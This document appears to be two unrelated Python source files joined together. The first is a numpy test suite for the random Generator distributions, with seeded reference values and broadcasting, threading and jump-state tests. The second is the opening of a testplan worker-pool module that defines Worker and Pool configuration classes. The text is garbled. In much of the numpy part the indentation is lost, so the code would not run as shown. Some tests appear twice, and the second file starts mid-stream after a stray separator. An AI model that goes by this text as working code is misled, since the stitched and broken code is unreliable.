        # account for i386 extended precision DBL_MAX / 1e17 + DBL_MAX >
        # DBL_MAX by increasing fmin a bit
        random.uniform(low=np.nextafter(fmin, 1), high=fmax / 1e17)
def test_scalar_exception_propagation(self):
# Tests that exceptions are correctly propagated in distributions
# when called with objects that throw exceptions when converted to
# scalars.
#
# Regression test for gh: 8865
class ThrowingFloat(np.ndarray):
def __float__(self):
raise TypeError
throwing_float = np.array(1.0).view(ThrowingFloat)
assert_raises(TypeError, random.uniform, throwing_float,
throwing_float)
class ThrowingInteger(np.ndarray):
def __int__(self):
raise TypeError
throwing_int = np.array(1).view(ThrowingInteger)
assert_raises(TypeError, random.hypergeometric, throwing_int, 1, 1)
    def test_vonmises(self):
        """Von Mises draws from a fixed MT19937 seed match reference values."""
        random = Generator(MT19937(self.seed))
        actual = random.vonmises(mu=1.23, kappa=1.54, size=(3, 2))
        desired = np.array([[ 1.107972248690106, 2.841536476232361],
                            [ 1.832602376042457, 1.945511926976032],
                            [-0.260147475776542, 2.058047492231698]])
        assert_array_almost_equal(actual, desired, decimal=15)
    def test_vonmises_small(self):
        """Tiny kappa must not hang or produce non-finite values.

        check infinite loop, gh-4720
        """
        random = Generator(MT19937(self.seed))
        r = random.vonmises(mu=0., kappa=1.1e-8, size=10**6)
        assert_(np.isfinite(r).all())
    def test_vonmises_nan(self):
        """A NaN kappa propagates to a NaN draw rather than raising."""
        random = Generator(MT19937(self.seed))
        r = random.vonmises(mu=0., kappa=np.nan)
        assert_(np.isnan(r))
    def test_wald(self):
        """Wald (inverse Gaussian) draws from a fixed MT19937 seed match reference values."""
        random = Generator(MT19937(self.seed))
        actual = random.wald(mean=1.23, scale=1.54, size=(3, 2))
        desired = np.array([[0.26871721804551, 3.2233942732115 ],
                            [2.20328374987066, 2.40958405189353],
                            [2.07093587449261, 0.73073890064369]])
        assert_array_almost_equal(actual, desired, decimal=14)
    def test_weibull(self):
        """Weibull draws from a fixed MT19937 seed match reference values."""
        random = Generator(MT19937(self.seed))
        actual = random.weibull(a=1.23, size=(3, 2))
        desired = np.array([[0.138613914769468, 1.306463419753191],
                            [0.111623365934763, 1.446570494646721],
                            [1.257145775276011, 1.914247725027957]])
        assert_array_almost_equal(actual, desired, decimal=15)
    def test_weibull_0(self):
        """a=0 degenerates to all zeros; negative zero a is rejected."""
        random = Generator(MT19937(self.seed))
        assert_equal(random.weibull(a=0, size=12), np.zeros(12))
        assert_raises(ValueError, random.weibull, a=-0.)
    def test_zipf(self):
        """Zipf draws from a fixed MT19937 seed match reference values."""
        random = Generator(MT19937(self.seed))
        actual = random.zipf(a=1.23, size=(3, 2))
        desired = np.array([[ 1, 1],
                            [ 10, 867],
                            [354, 2]])
        assert_array_equal(actual, desired)
class TestBroadcast:
# tests that functions that broadcast behave
# correctly when presented with non-scalar arguments
def setup(self):
self.seed = 123456789
def test_uniform(self):
random = Generator(MT19937(self.seed))
low = [0]
high = [1]
uniform = random.uniform
desired = np.array([0.16693771389729, 0.19635129550675, 0.75563050964095])
random = Generator(MT19937(self.seed))
actual = random.uniform(low * 3, high)
assert_array_almost_equal(actual, desired, decimal=14)
random = Generator(MT19937(self.seed))
actual = random.uniform(low, high * 3)
assert_array_almost_equal(actual, desired, decimal=14)
def test_normal(self):
loc = [0]
scale = [1]
bad_scale = [-1]
random = Generator(MT19937(self.seed))
desired = np.array([-0.38736406738527, 0.79594375042255, 0.0197076236097])
random = Generator(MT19937(self.seed))
actual = random.normal(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.normal, loc * 3, bad_scale)
random = Generator(MT19937(self.seed))
normal = random.normal
actual = normal(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, normal, loc, bad_scale * 3)
def test_beta(self):
a = [1]
b = [2]
bad_a = [-1]
bad_b = [-2]
desired = np.array([0.18719338682602, 0.73234824491364, 0.17928615186455])
random = Generator(MT19937(self.seed))
beta = random.beta
actual = beta(a * 3, b)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, beta, bad_a * 3, b)
assert_raises(ValueError, beta, a * 3, bad_b)
random = Generator(MT19937(self.seed))
actual = random.beta(a, b * 3)
assert_array_almost_equal(actual, desired, decimal=14)
def test_exponential(self):
scale = [1]
bad_scale = [-1]
desired = np.array([0.67245993212806, 0.21380495318094, 0.7177848928629])
random = Generator(MT19937(self.seed))
actual = random.exponential(scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.exponential, bad_scale * 3)
def test_standard_gamma(self):
shape = [1]
bad_shape = [-1]
desired = np.array([0.67245993212806, 0.21380495318094, 0.7177848928629])
random = Generator(MT19937(self.seed))
std_gamma = random.standard_gamma
actual = std_gamma(shape * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, std_gamma, bad_shape * 3)
def test_gamma(self):
shape = [1]
scale = [2]
bad_shape = [-1]
bad_scale = [-2]
desired = np.array([1.34491986425611, 0.42760990636187, 1.4355697857258])
random = Generator(MT19937(self.seed))
gamma = random.gamma
actual = gamma(shape * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gamma, bad_shape * 3, scale)
assert_raises(ValueError, gamma, shape * 3, bad_scale)
random = Generator(MT19937(self.seed))
gamma = random.gamma
actual = gamma(shape, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gamma, bad_shape, scale * 3)
assert_raises(ValueError, gamma, shape, bad_scale * 3)
def test_f(self):
dfnum = [1]
dfden = [2]
bad_dfnum = [-1]
bad_dfden = [-2]
desired = np.array([0.07765056244107, 7.72951397913186, 0.05786093891763])
random = Generator(MT19937(self.seed))
f = random.f
actual = f(dfnum * 3, dfden)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, f, bad_dfnum * 3, dfden)
assert_raises(ValueError, f, dfnum * 3, bad_dfden)
random = Generator(MT19937(self.seed))
f = random.f
actual = f(dfnum, dfden * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, f, bad_dfnum, dfden * 3)
assert_raises(ValueError, f, dfnum, bad_dfden * 3)
def test_noncentral_f(self):
dfnum = [2]
dfden = [3]
nonc = [4]
bad_dfnum = [0]
bad_dfden = [-1]
bad_nonc = [-2]
desired = np.array([2.02434240411421, 12.91838601070124, 1.24395160354629])
random = Generator(MT19937(self.seed))
nonc_f = random.noncentral_f
actual = nonc_f(dfnum * 3, dfden, nonc)
assert_array_almost_equal(actual, desired, decimal=14)
assert np.all(np.isnan(nonc_f(dfnum, dfden, [np.nan] * 3)))
assert_raises(ValueError, nonc_f, bad_dfnum * 3, dfden, nonc)
assert_raises(ValueError, nonc_f, dfnum * 3, bad_dfden, nonc)
assert_raises(ValueError, nonc_f, dfnum * 3, dfden, bad_nonc)
random = Generator(MT19937(self.seed))
nonc_f = random.noncentral_f
actual = nonc_f(dfnum, dfden * 3, nonc)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_f, bad_dfnum, dfden * 3, nonc)
assert_raises(ValueError, nonc_f, dfnum, bad_dfden * 3, nonc)
assert_raises(ValueError, nonc_f, dfnum, dfden * 3, bad_nonc)
random = Generator(MT19937(self.seed))
nonc_f = random.noncentral_f
actual = nonc_f(dfnum, dfden, nonc * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_f, bad_dfnum, dfden, nonc * 3)
assert_raises(ValueError, nonc_f, dfnum, bad_dfden, nonc * 3)
assert_raises(ValueError, nonc_f, dfnum, dfden, bad_nonc * 3)
def test_noncentral_f_small_df(self):
random = Generator(MT19937(self.seed))
desired = np.array([0.04714867120827, 0.1239390327694])
actual = random.noncentral_f(0.9, 0.9, 2, size=2)
assert_array_almost_equal(actual, desired, decimal=14)
def test_chisquare(self):
df = [1]
bad_df = [-1]
desired = np.array([0.05573640064251, 1.47220224353539, 2.9469379318589])
random = Generator(MT19937(self.seed))
actual = random.chisquare(df * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.chisquare, bad_df * 3)
def test_noncentral_chisquare(self):
df = [1]
nonc = [2]
bad_df = [-1]
bad_nonc = [-2]
desired = np.array([0.07710766249436, 5.27829115110304, 0.630732147399])
random = Generator(MT19937(self.seed))
nonc_chi = random.noncentral_chisquare
actual = nonc_chi(df * 3, nonc)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_chi, bad_df * 3, nonc)
assert_raises(ValueError, nonc_chi, df * 3, bad_nonc)
random = Generator(MT19937(self.seed))
nonc_chi = random.noncentral_chisquare
actual = nonc_chi(df, nonc * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_chi, bad_df, nonc * 3)
assert_raises(ValueError, nonc_chi, df, bad_nonc * 3)
def test_standard_t(self):
df = [1]
bad_df = [-1]
desired = np.array([-1.39498829447098, -1.23058658835223, 0.17207021065983])
random = Generator(MT19937(self.seed))
actual = random.standard_t(df * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.standard_t, bad_df * 3)
def test_vonmises(self):
mu = [2]
kappa = [1]
bad_kappa = [-1]
desired = np.array([2.25935584988528, 2.23326261461399, -2.84152146503326])
random = Generator(MT19937(self.seed))
actual = random.vonmises(mu * 3, kappa)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.vonmises, mu * 3, bad_kappa)
random = Generator(MT19937(self.seed))
actual = random.vonmises(mu, kappa * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.vonmises, mu, bad_kappa * 3)
def test_pareto(self):
a = [1]
bad_a = [-1]
desired = np.array([0.95905052946317, 0.2383810889437 , 1.04988745750013])
random = Generator(MT19937(self.seed))
actual = random.pareto(a * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.pareto, bad_a * 3)
def test_weibull(self):
a = [1]
bad_a = [-1]
desired = np.array([0.67245993212806, 0.21380495318094, 0.7177848928629])
random = Generator(MT19937(self.seed))
actual = random.weibull(a * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.weibull, bad_a * 3)
def test_power(self):
a = [1]
bad_a = [-1]
desired = np.array([0.48954864361052, 0.19249412888486, 0.51216834058807])
random = Generator(MT19937(self.seed))
actual = random.power(a * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.power, bad_a * 3)
def test_laplace(self):
loc = [0]
scale = [1]
bad_scale = [-1]
desired = np.array([-1.09698732625119, -0.93470271947368, 0.71592671378202])
random = Generator(MT19937(self.seed))
laplace = random.laplace
actual = laplace(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, laplace, loc * 3, bad_scale)
random = Generator(MT19937(self.seed))
laplace = random.laplace
actual = laplace(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, laplace, loc, bad_scale * 3)
def test_gumbel(self):
loc = [0]
scale = [1]
bad_scale = [-1]
desired = np.array([1.70020068231762, 1.52054354273631, -0.34293267607081])
random = Generator(MT19937(self.seed))
gumbel = random.gumbel
actual = gumbel(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gumbel, loc * 3, bad_scale)
random = Generator(MT19937(self.seed))
gumbel = random.gumbel
actual = gumbel(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gumbel, loc, bad_scale * 3)
def test_logistic(self):
loc = [0]
scale = [1]
bad_scale = [-1]
desired = np.array([-1.607487640433, -1.40925686003678, 1.12887112820397])
random = Generator(MT19937(self.seed))
actual = random.logistic(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.logistic, loc * 3, bad_scale)
random = Generator(MT19937(self.seed))
actual = random.logistic(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.logistic, loc, bad_scale * 3)
assert_equal(random.logistic(1.0, 0.0), 1.0)
def test_lognormal(self):
mean = [0]
sigma = [1]
bad_sigma = [-1]
desired = np.array([0.67884390500697, 2.21653186290321, 1.01990310084276])
random = Generator(MT19937(self.seed))
lognormal = random.lognormal
actual = lognormal(mean * 3, sigma)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, lognormal, mean * 3, bad_sigma)
random = Generator(MT19937(self.seed))
actual = random.lognormal(mean, sigma * 3)
assert_raises(ValueError, random.lognormal, mean, bad_sigma * 3)
def test_rayleigh(self):
scale = [1]
bad_scale = [-1]
desired = np.array([0.60439534475066, 0.66120048396359, 1.67873398389499])
random = Generator(MT19937(self.seed))
actual = random.rayleigh(scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.rayleigh, bad_scale * 3)
def test_wald(self):
mean = [0.5]
scale = [1]
bad_mean = [0]
bad_scale = [-2]
desired = np.array([0.38052407392905, 0.50701641508592, 0.484935249864])
random = Generator(MT19937(self.seed))
actual = random.wald(mean * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.wald, bad_mean * 3, scale)
assert_raises(ValueError, random.wald, mean * 3, bad_scale)
random = Generator(MT19937(self.seed))
actual = random.wald(mean, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.wald, bad_mean, scale * 3)
assert_raises(ValueError, random.wald, mean, bad_scale * 3)
def test_triangular(self):
left = [1]
right = [3]
mode = [2]
bad_left_one = [3]
bad_mode_one = [4]
bad_left_two, bad_mode_two = right * 2
desired = np.array([1.57781954604754, 1.62665986867957, 2.30090130831326])
random = Generator(MT19937(self.seed))
triangular = random.triangular
actual = triangular(left * 3, mode, right)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, triangular, bad_left_one * 3, mode, right)
assert_raises(ValueError, triangular, left * 3, bad_mode_one, right)
assert_raises(ValueError, triangular, bad_left_two * 3, bad_mode_two,
right)
random = Generator(MT19937(self.seed))
triangular = random.triangular
actual = triangular(left, mode * 3, right)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, triangular, bad_left_one, mode * 3, right)
assert_raises(ValueError, triangular, left, bad_mode_one * 3, right)
assert_raises(ValueError, triangular, bad_left_two, bad_mode_two * 3,
right)
random = Generator(MT19937(self.seed))
triangular = random.triangular
actual = triangular(left, mode, right * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, triangular, bad_left_one, mode, right * 3)
assert_raises(ValueError, triangular, left, bad_mode_one, right * 3)
assert_raises(ValueError, triangular, bad_left_two, bad_mode_two,
right * 3)
assert_raises(ValueError, triangular, 10., 0., 20.)
assert_raises(ValueError, triangular, 10., 25., 20.)
assert_raises(ValueError, triangular, 10., 10., 10.)
def test_binomial(self):
n = [1]
p = [0.5]
bad_n = [-1]
bad_p_one = [-1]
bad_p_two = [1.5]
desired = np.array([0, 0, 1])
random = Generator(MT19937(self.seed))
binom = random.binomial
actual = binom(n * 3, p)
assert_array_equal(actual, desired)
assert_raises(ValueError, binom, bad_n * 3, p)
assert_raises(ValueError, binom, n * 3, bad_p_one)
assert_raises(ValueError, binom, n * 3, bad_p_two)
random = Generator(MT19937(self.seed))
actual = random.binomial(n, p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, binom, bad_n, p * 3)
assert_raises(ValueError, binom, n, bad_p_one * 3)
assert_raises(ValueError, binom, n, bad_p_two * 3)
def test_negative_binomial(self):
n = [1]
p = [0.5]
bad_n = [-1]
bad_p_one = [-1]
bad_p_two = [1.5]
desired = np.array([0, 2, 1], dtype=np.int64)
random = Generator(MT19937(self.seed))
neg_binom = random.negative_binomial
actual = neg_binom(n * 3, p)
assert_array_equal(actual, desired)
assert_raises(ValueError, neg_binom, bad_n * 3, p)
assert_raises(ValueError, neg_binom, n * 3, bad_p_one)
assert_raises(ValueError, neg_binom, n * 3, bad_p_two)
random = Generator(MT19937(self.seed))
neg_binom = random.negative_binomial
actual = neg_binom(n, p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, neg_binom, bad_n, p * 3)
assert_raises(ValueError, neg_binom, n, bad_p_one * 3)
assert_raises(ValueError, neg_binom, n, bad_p_two * 3)
def test_poisson(self):
lam = [1]
bad_lam_one = [-1]
desired = np.array([0, 0, 3])
random = Generator(MT19937(self.seed))
max_lam = random._poisson_lam_max
bad_lam_two = [max_lam * 2]
poisson = random.poisson
actual = poisson(lam * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, poisson, bad_lam_one * 3)
assert_raises(ValueError, poisson, bad_lam_two * 3)
def test_zipf(self):
a = [2]
bad_a = [0]
desired = np.array([1, 8, 1])
random = Generator(MT19937(self.seed))
zipf = random.zipf
actual = zipf(a * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, zipf, bad_a * 3)
with np.errstate(invalid='ignore'):
assert_raises(ValueError, zipf, np.nan)
assert_raises(ValueError, zipf, [0, 0, np.nan])
def test_geometric(self):
p = [0.5]
bad_p_one = [-1]
bad_p_two = [1.5]
desired = np.array([1, 1, 3])
random = Generator(MT19937(self.seed))
geometric = random.geometric
actual = geometric(p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, geometric, bad_p_one * 3)
assert_raises(ValueError, geometric, bad_p_two * 3)
def test_hypergeometric(self):
ngood = [1]
nbad = [2]
nsample = [2]
bad_ngood = [-1]
bad_nbad = [-2]
bad_nsample_one = [-1]
bad_nsample_two = [4]
desired = np.array([0, 0, 1])
random = Generator(MT19937(self.seed))
actual = random.hypergeometric(ngood * 3, nbad, nsample)
assert_array_equal(actual, desired)
assert_raises(ValueError, random.hypergeometric, bad_ngood * 3, nbad, nsample)
assert_raises(ValueError, random.hypergeometric, ngood * 3, bad_nbad, nsample)
assert_raises(ValueError, random.hypergeometric, ngood * 3, nbad, bad_nsample_one)
assert_raises(ValueError, random.hypergeometric, ngood * 3, nbad, bad_nsample_two)
random = Generator(MT19937(self.seed))
actual = random.hypergeometric(ngood, nbad * 3, nsample)
assert_array_equal(actual, desired)
assert_raises(ValueError, random.hypergeometric, bad_ngood, nbad * 3, nsample)
assert_raises(ValueError, random.hypergeometric, ngood, bad_nbad * 3, nsample)
assert_raises(ValueError, random.hypergeometric, ngood, nbad * 3, bad_nsample_one)
assert_raises(ValueError, random.hypergeometric, ngood, nbad * 3, bad_nsample_two)
random = Generator(MT19937(self.seed))
hypergeom = random.hypergeometric
actual = hypergeom(ngood, nbad, nsample * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, hypergeom, bad_ngood, nbad, nsample * 3)
assert_raises(ValueError, hypergeom, ngood, bad_nbad, nsample * 3)
assert_raises(ValueError, hypergeom, ngood, nbad, bad_nsample_one * 3)
assert_raises(ValueError, hypergeom, ngood, nbad, bad_nsample_two * 3)
assert_raises(ValueError, hypergeom, -1, 10, 20)
assert_raises(ValueError, hypergeom, 10, -1, 20)
assert_raises(ValueError, hypergeom, 10, 10, -1)
assert_raises(ValueError, hypergeom, 10, 10, 25)
# ValueError for arguments that are too big.
assert_raises(ValueError, hypergeom, 2**30, 10, 20)
assert_raises(ValueError, hypergeom, 999, 2**31, 50)
assert_raises(ValueError, hypergeom, 999, [2**29, 2**30], 1000)
def test_logseries(self):
p = [0.5]
bad_p_one = [2]
bad_p_two = [-1]
desired = np.array([1, 1, 1])
random = Generator(MT19937(self.seed))
logseries = random.logseries
actual = logseries(p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, logseries, bad_p_one * 3)
assert_raises(ValueError, logseries, bad_p_two * 3)
def test_multinomial(self):
    # Broadcasting: per-row trial counts [5, 20] drawn against a fair
    # six-sided die, replicated into an explicit (3, 2) sample grid.
    random = Generator(MT19937(self.seed))
    actual = random.multinomial([5, 20], [1 / 6.] * 6, size=(3, 2))
    desired = np.array([[[0, 0, 2, 1, 2, 0],
                         [2, 3, 6, 4, 2, 3]],
                        [[1, 0, 1, 0, 2, 1],
                         [7, 2, 2, 1, 4, 4]],
                        [[0, 2, 0, 1, 2, 0],
                         [3, 2, 3, 3, 4, 5]]], dtype=np.int64)
    assert_array_equal(actual, desired)

    # Without ``size`` the output follows the broadcast shape (2, 6);
    # with a fresh identical seed the first grid row must be reproduced.
    random = Generator(MT19937(self.seed))
    actual = random.multinomial([5, 20], [1 / 6.] * 6)
    desired = np.array([[0, 0, 2, 1, 2, 0],
                        [2, 3, 6, 4, 2, 3]], dtype=np.int64)
    assert_array_equal(actual, desired)
class TestThread:
    """Make sure each seeded Generator produces the same stream in threads
    as it does serially."""

    def setup(self):
        self.seeds = range(4)

    def check_function(self, function, sz):
        """Run *function(generator, out)* once per seed, threaded and serial,
        and assert both fill identical arrays of shape ``(n_seeds,) + sz``."""
        from threading import Thread
        out1 = np.empty((len(self.seeds),) + sz)
        out2 = np.empty((len(self.seeds),) + sz)

        # threaded generation
        # Fix: use plain for-loops rather than list comprehensions executed
        # purely for their side effects ([x.start() for x in t]).
        threads = [Thread(target=function, args=(Generator(MT19937(s)), o))
                   for s, o in zip(self.seeds, out1)]
        for thread in threads:
            thread.start()
        for thread in threads:
            thread.join()

        # the same, serially
        for s, o in zip(self.seeds, out2):
            function(Generator(MT19937(s)), o)

        # these platforms change x87 fpu precision mode in threads
        if np.intp().dtype.itemsize == 4 and sys.platform == "win32":
            assert_array_almost_equal(out1, out2)
        else:
            assert_array_equal(out1, out2)

    def test_normal(self):
        def gen_random(state, out):
            out[...] = state.normal(size=10000)
        self.check_function(gen_random, sz=(10000,))

    def test_exp(self):
        def gen_random(state, out):
            out[...] = state.exponential(scale=np.ones((100, 1000)))
        self.check_function(gen_random, sz=(100, 1000))

    def test_multinomial(self):
        def gen_random(state, out):
            out[...] = state.multinomial(10, [1 / 6.] * 6, size=10000)
        self.check_function(gen_random, sz=(10000, 6))
# See Issue #4263
class TestSingleEltArrayInput:
def setup(self):
self.argOne = np.array([2])
self.argTwo = np.array([3])
self.argThree = np.array([4])
self.tgtShape = (1,)
def test_one_arg_funcs(self):
funcs = (random.exponential, random.standard_gamma,
random.chisquare, random.standard_t,
random.pareto, random.weibull,
random.power, random.rayleigh,
random.poisson, random.zipf,
random.geometric, random.logseries)
probfuncs = (random.geometric, random.logseries)
for func in funcs:
if func in probfuncs: # p < 1.0
out = func(np.array([0.5]))
else:
out = func(self.argOne)
assert_equal(out.shape, self.tgtShape)
def test_two_arg_funcs(self):
funcs = (random.uniform, random.normal,
random.beta, random.gamma,
random.f, random.noncentral_chisquare,
random.vonmises, random.laplace,
random.gumbel, random.logistic,
random.lognormal, random.wald,
random.binomial, random.negative_binomial)
probfuncs = (random.binomial, random.negative_binomial)
for func in funcs:
if func in probfuncs: # p <= 1
argTwo = np.array([0.5])
else:
argTwo = self.argTwo
out = func(self.argOne, argTwo)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne[0], argTwo)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne, argTwo[0])
assert_equal(out.shape, self.tgtShape)
def test_integers(self, endpoint):
itype = [np.bool_, np.int8, np.uint8, np.int16, np.uint16,
np.int32, np.uint32, np.int64, np.uint64]
func = random.integers
high = np.array([1])
low = np.array([0])
for dt in itype:
out = func(low, high, endpoint=endpoint, dtype=dt)
assert_equal(out.shape, self.tgtShape)
out = func(low[0], high, endpoint=endpoint, dtype=dt)
assert_equal(out.shape, self.tgtShape)
out = func(low, high[0], endpoint=endpoint, dtype=dt)
assert_equal(out.shape, self.tgtShape)
def test_three_arg_funcs(self):
funcs = [random.noncentral_f, random.triangular,
random.hypergeometric]
for func in funcs:
out = func(self.argOne, self.argTwo, self.argThree)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne[0], self.argTwo, self.argThree)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne, self.argTwo[0], self.argThree)
assert_equal(out.shape, self.tgtShape)
@pytest.mark.parametrize("config", JUMP_TEST_DATA)
def test_jumped(config):
    # Each config contains the initial seed, a number of raw steps,
    # the md5 hashes of the initial and the final states' keys and
    # the position of the initial and the final state.
    # These were produced using the original C implementation.
    def key_fingerprint(bit_generator):
        """Return (pos, md5-hex) of the MT19937 state key, endian-normalised."""
        state = bit_generator.state["state"]
        key = state["key"]
        if sys.byteorder == 'big':
            key = key.byteswap()
        return state["pos"], hashlib.md5(key).hexdigest()

    mt19937 = MT19937(config["seed"])
    # Burn step: advance the raw stream to the recorded position.
    mt19937.random_raw(config["steps"])

    pos, digest = key_fingerprint(mt19937)
    assert pos == config["initial"]["pos"]
    assert digest == config["initial"]["key_md5"]

    pos, digest = key_fingerprint(mt19937.jumped())
    assert pos == config["jumped"]["pos"]
    assert digest == config["jumped"]["key_md5"]
|
base.py | """Worker pool executor base classes."""
import os
import numbers
import threading
import time
import datetime
import pprint
import traceback
import queue
from schema import Or, And, Use
from testplan.common.config import ConfigOption, validate_func
from testplan.common import entity
from testplan.common.utils.thread import interruptible_join
from testplan.common.utils.timing import wait_until_predicate
from testplan.common.utils import strings
from testplan.runners.base import Executor, ExecutorConfig
from testplan.report import ReportCategories
from .communication import Message
from .connection import QueueClient, QueueServer
from .tasks import Task, TaskResult
from testplan.common.entity import ResourceStatus
class WorkerConfig(entity.ResourceConfig):
    """
    Configuration object for
    :py:class:`~testplan.runners.pools.base.Worker` resource entity.
    """

    @classmethod
    def get_options(cls):
        """
        Schema for options validation and assignment of default values.
        """
        return {
            # Mandatory unique id of the worker within its pool.
            "index": Or(int, str),
            # Transport class used for pool <-> worker messaging.
            ConfigOption("transport", default=QueueClient): object,
            # How many times the pool may restart this worker.
            ConfigOption("restart_count", default=3): int,
        }
class Worker(entity.Resource):
    """
    Worker resource that pulls tasks from the transport provided, executes them
    and sends back task results.

    :param index: Worker index id.
    :type index: ``int`` or ``str``
    :param transport: Transport class for pool/worker communication.
    :type transport: :py:class:`~testplan.runners.pools.connection.Client`
    :param restart_count: How many times a worker in pool can be restarted.
    :type restart_count: ``int``

    Also inherits all :py:class:`~testplan.common.entity.base.Resource`
    options.
    """

    CONFIG = WorkerConfig

    def __init__(self, **options):
        super(Worker, self).__init__(**options)
        self._metadata = None  # built lazily on first access (see metadata)
        self._transport = self.cfg.transport()
        self._handler = None  # daemonic loop thread, created in starting()
        self.last_heartbeat = None  # set by the pool when a heartbeat arrives
        self.assigned = set()  # uids of tasks currently assigned to this worker
        self.requesting = 0  # tasks this worker still asks for (set by pool)
        self.restart_count = self.cfg.restart_count

    @property
    def handler(self):
        """Thread running the worker loop (``None`` before start / after stop)."""
        return self._handler

    @property
    def transport(self):
        """Pool/Worker communication transport."""
        return self._transport

    @property
    def metadata(self):
        """Worker metadata information."""
        if not self._metadata:
            self._metadata = {
                "thread": threading.current_thread(),
                "index": self.cfg.index,
            }
        return self._metadata

    @property
    def outfile(self):
        """Stdout file."""
        return os.path.join(
            self.parent.runpath, "{}_startup".format(self.cfg.index)
        )

    def uid(self):
        """Worker unique index."""
        return self.cfg.index

    def starting(self):
        """Starts the daemonic worker loop."""
        self.make_runpath_dirs()
        self._handler = threading.Thread(
            target=self._loop, args=(self._transport,)
        )
        self._handler.daemon = True
        self._handler.start()
        self.status.change(self.STATUS.STARTED)

    def stopping(self):
        """Stops the worker."""
        # Join the loop thread; interruptible so Ctrl-C is not swallowed.
        if self._handler:
            interruptible_join(self._handler)
        self._handler = None
        self.status.change(self.STATUS.STOPPED)

    def aborting(self):
        """Aborting logic, will not wait running tasks."""
        self._transport.disconnect()

    @property
    def is_alive(self):
        """Poll the loop handler thread to check it is running as expected."""
        return self._handler.is_alive()

    def _loop(self, transport):
        """Worker loop: pull tasks, execute them, post results until stopped."""
        message = Message(**self.metadata)

        while self.active and self.status.tag not in (
            self.status.STOPPING,
            self.status.STOPPED,
        ):
            received = transport.send_and_receive(
                message.make(message.TaskPullRequest, data=1)
            )
            if received is None or received.cmd == Message.Stop:
                # Pool is gone or told us to stop - leave the loop.
                break
            elif received.cmd == Message.TaskSending:
                results = []
                for item in received.data:
                    results.append(self.execute(item))
                transport.send_and_receive(
                    message.make(message.TaskResults, data=results),
                    expect=message.Ack,
                )
            elif received.cmd == Message.Ack:
                # Nothing assigned this round; just sleep and poll again.
                pass
            time.sleep(self.cfg.active_loop_sleep)

    def execute(self, task):
        """
        Executes a task and return the associated task result.

        :param task: Task that worker pulled for execution.
        :type task: :py:class:`~testplan.runners.pools.tasks.base.Task`
        :return: Task result.
        :rtype: :py:class:`~testplan.runners.pools.tasks.base.TaskResult`
        """
        try:
            runnable = task.materialize()
            if isinstance(runnable, entity.Runnable):
                # Parent the runnable to this worker so it inherits context.
                if not runnable.parent:
                    runnable.parent = self
                if not runnable.cfg.parent:
                    runnable.cfg.parent = self.cfg
            result = runnable.run()
        except BaseException:
            # BaseException on purpose: any failure (including SystemExit /
            # KeyboardInterrupt) must still be reported back as a TaskResult.
            task_result = TaskResult(
                task=task,
                result=None,
                status=False,
                reason=traceback.format_exc(),
            )
        else:
            task_result = TaskResult(task=task, result=result, status=True)
        return task_result

    def respond(self, msg):
        """
        Method that the pool uses to respond with a message to the worker.

        :param msg: Response message.
        :type msg: :py:class:`~testplan.runners.pools.communication.Message`
        """
        self._transport.respond(msg)

    def __repr__(self):
        return "{}[{}]".format(self.__class__.__name__, self.cfg.index)
class PoolConfig(ExecutorConfig):
    """
    Configuration object for
    :py:class:`~testplan.runners.pools.base.Pool` executor resource entity.
    """

    @classmethod
    def get_options(cls):
        """
        Schema for options validation and assignment of default values.
        """
        return {
            # Mandatory pool name (also the executor uid).
            "name": str,
            # Number of workers; must be strictly positive.
            ConfigOption("size", default=4): And(int, lambda x: x > 0),
            ConfigOption("worker_type", default=Worker): object,
